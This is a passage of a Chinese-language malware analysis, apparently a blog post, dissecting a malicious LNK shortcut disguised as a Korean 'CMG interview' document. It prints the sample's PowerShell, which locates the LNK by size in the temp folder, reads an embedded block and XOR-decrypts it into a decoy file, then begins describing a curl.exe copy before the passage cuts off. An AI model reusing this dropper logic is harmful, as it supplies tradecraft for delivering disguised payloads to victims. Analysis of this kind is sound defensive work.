GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">$notify=$notify|where-object{$_.$shopping -eq 0x0260F8};</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">/</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">/</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">定位大小为</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">0x0260F8</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">的</span></span></font><font><span leaf=""><span textstyle="" style="font-weight: normal;">lnk文件</span></span></font></span></span></p><p style="" data-mpa-action-id="mp3oumwpszd"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5s3t"><span leaf=""><span textstyle="" style="font-weight: normal;">$monkey=$notify;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1pyg"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5ev1"><span leaf=""><span textstyle="" style="font-weight: normal;">$notify=$notify|Select-Object -ExpandProperty Name;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwpkcr"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5lq5"><span leaf=""><span textstyle="" style="font-weight: normal;">if([string]::IsNullOrEmpty($notify))</span></span></span></p><p style="" data-mpa-action-id="mp3oumwpuw2"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw523f8"><span leaf=""><span textstyle="" style="font-weight: normal;">{</span></span></span></p><p style="" data-mpa-action-id="mp3oumwpndj"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5omd"><span leaf=""><span textstyle="" style="font-weight: normal;">$comp=1;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp21kp"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5y5k"><span leaf=""><span textstyle="" style="font-weight: normal;">$sunday=$env:USERPROFILE;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1k9f"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5cg9"><span leaf=""><span textstyle="" style="font-weight: normal;">$sunday=$sunday+&#39;\appdata\local\temp&#39;;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1at3"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw54xa"><span leaf=""><span textstyle="" style="font-weight: normal;">$notify=Get-ChildItem -Path $sunday -Recurse -Filter *.lnk|where-object{$_.$shopping -eq 0x0260F8}|ForEach-Object{$_.FullName}|Select-Object -First 1;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp221z"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw51wrg"><span leaf=""><span textstyle="" style="font-weight: normal;">$monkey=$notify</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1lr7"><span mpa-font-style="mp3oumw51omk" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">};//</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">获取在</span></span></font><font><span leaf=""><span textstyle="" style="font-weight: normal;">%</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">temp%</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">目录定位此文件</span></span></font><font><span leaf=""><span textstyle="" style="font-weight: normal;">(大小为</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">0x0260F8</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">字节</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">)</span></span></span></span></p><p style="" data-mpa-action-id="mp3oumwprcp"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw53zy"><span leaf=""><span textstyle="" style="font-weight: normal;">$oil=$notify.substring(0,$notify.length-4);</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1bwp"><span mpa-font-style="mp3oumw51f5w" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">$wire=[System.IO.BinaryReader]::new([System.IO.File]::open($notify,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::Read)); //</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">读取文件</span></span></font></span></span></p><p style="" data-mpa-action-id="mp3oumwpkws"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw517iq"><span leaf=""><span textstyle="" style="font-weight: normal;">try</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1ona"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw56p1"><span leaf=""><span textstyle="" style="font-weight: normal;">{</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1xcv"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5elx"><span leaf=""><span textstyle="" style="font-weight: normal;">$wire.BaseStream.Seek(0x00001B58,[System.IO.SeekOrigin]::Begin);</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1hlf"><span mpa-font-style="mp3oumw5uz5" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">$snow=$wire.ReadBytes(0x06972);</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">/</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">/</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">从</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">0x00001B58</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">处读取</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">0x06972</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">大小的数据</span></span></font></span></span></p><p style="" data-mpa-action-id="mp3oumwpino"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw510rm"><span leaf=""><span textstyle="" style="font-weight: normal;">}finally</span></span></span></p><p style="" data-mpa-action-id="mp3oumwpsre"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5a3t"><span leaf=""><span textstyle="" style="font-weight: normal;">{</span></span></span></p><p style="" data-mpa-action-id="mp3oumwpn7q"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw512lx"><span leaf=""><span textstyle="" style="font-weight: normal;">$wire.Close()</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1cza"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw51n7c"><span leaf=""><span textstyle="" style="font-weight: normal;">};</span></span></span></p><p style="" data-mpa-action-id="mp3oumwpnsp"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5gbz"><span leaf=""><span textstyle="" style="font-weight: normal;">$black=0;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwpadu"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw521f9"><span leaf=""><span textstyle="" style="font-weight: normal;">$chair=0;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1yf9"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw51alg"><span leaf=""><span textstyle="" style="font-weight: normal;">$body=$snow.count;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp83t"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw5r21"><span leaf=""><span textstyle="" style="font-weight: normal;">while ($black -lt $body)</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1t19"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw51ljf"><span leaf=""><span textstyle="" style="font-weight: normal;">{</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1ccb"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw512yo"><span leaf=""><span textstyle="" style="font-weight: normal;">$chipper=0x26;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1ud3"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw518ut"><span leaf=""><span textstyle="" style="font-weight: normal;">$date=($chipper+$black%2)%0x100;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1w2b"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw51ey1"><span leaf=""><span textstyle="" style="font-weight: normal;">$snow[$black]=$snow[$black] -bxor $date;</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp21e6"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw51le"><span leaf=""><span textstyle="" style="font-weight: normal;">$black++</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1104"><span mpa-font-style="mp3oumw544d" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">};</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">/</span></span></font></span><span style="font-size: 9pt;"><span leaf=""><span textstyle="" style="font-weight: normal;">/xor</span></span></span><span style="font-size: 9pt;"><font><span leaf=""><span textstyle="" style="font-weight: normal;">解密载荷</span></span></font></span></span></p><p style="" data-mpa-action-id="mp3oumwp18gp"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw51270"><span leaf=""><span textstyle="" style="font-weight: normal;">[System.IO.File]::WriteAllBytes($oil,$snow);</span></span></span></p><p style="" data-mpa-action-id="mp3oumwp1dc7"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 9pt;" mpa-font-style="mp3oumw51nhe"><span leaf=""><span textstyle="" style="font-weight: normal;">if($comp -eq 1){</span></span></span></p><p style="" data-mpa-action-id="mp3oumwpofr"><span style="font-family: 仿宋;font-size: 9pt;"><span style="font-weight: bold;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" mpa-font-style="mp3oumw517gg"><span leaf=""><span textstyle="" style="font-weight: normal;">$book=$oil</span></span></span></span></p></td></tr></tbody></table></p></div></div><p style="text-indent: 2em;text-align: justify;margin-top: 16px;margin-bottom: 16px;" data-pm-slice="0 0 []"><font face="仿宋"><span data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">这段代码的功能是在当前目录或者临时目录定位大小为</span></font></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">0x0260F8字节</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">（</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">156KB</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">）的</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">L</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">NK</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">文件，也就是名为</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span></font><font face="Malgun Gothic"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">중국</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> CMG </span><font face="Malgun Gothic"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">인터뷰</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.docx.lnk”的</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">文件，然后从偏移量</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"> 0x00001B58处读取0x06972字节（约27KB）数据</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">。最后使用</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">X</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">OR</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">算法解密出诱饵文件并打开。诱饵文档如下：</span></font></font></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8531889290012034" data-s="300,640" data-type="png" data-w="831" type="block" data-imgfileid="100024873" src="https://wechat2rss.xlab.app/img-proxy/?k=3c956dc5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJJxsrVDX0h5icD028Hs3BHQibOXL6jg79n83WqHv1zOrZpKlaENjSGB3icKgnWLsxvibicsd8DJqsJAzkB7gBeqDwKIrhQhgQ2XaBU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;text-align: left;margin-top: 16px;margin-bottom: 16px;" data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">第二个功能是拷贝</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">cu</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">rl.exe</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">为</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, 